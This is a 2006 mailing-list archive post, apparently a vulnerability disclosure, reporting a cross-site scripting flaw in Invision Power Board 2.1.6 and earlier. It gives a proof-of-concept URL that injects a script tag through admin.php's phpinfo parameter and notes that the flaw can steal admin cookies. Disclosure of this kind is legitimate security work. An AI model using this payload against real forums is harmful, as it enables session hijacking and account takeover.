Invision Power Board XSS

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Subject: Invision Power Board XSS
From: kepche@xxxxxxx
Date: 9 Jun 2006 21:02:58 -0000

*//Product  :Invision Power Board
*//Version :2.1.6 and prior versions must be affected.

*//XSS=
http://localhost/forum/admin.php?phpinfo=<script>alert()</script> 

*//You can steal only admins cookie.


*//www.spymastersnake.org
*//kepche@xxxxxxx

Prev by Date: Re: Ie opera dos exploit
Next by Date: Re: Windows XP Task Scheduler Local Privilege Escalation (Advisory)
Previous by thread: Blackplanet.com - XSS & cookie disclosure vuln.
Next by thread: internet explorer vulnerability based on MarjinZ & Mr.Niega discovered
Index(es):
- Date
- Thread

[Index of Archives] [Linux Security] [Netfilter] [PHP] [Yosemite News] [Linux Kernel]

Powered by Linux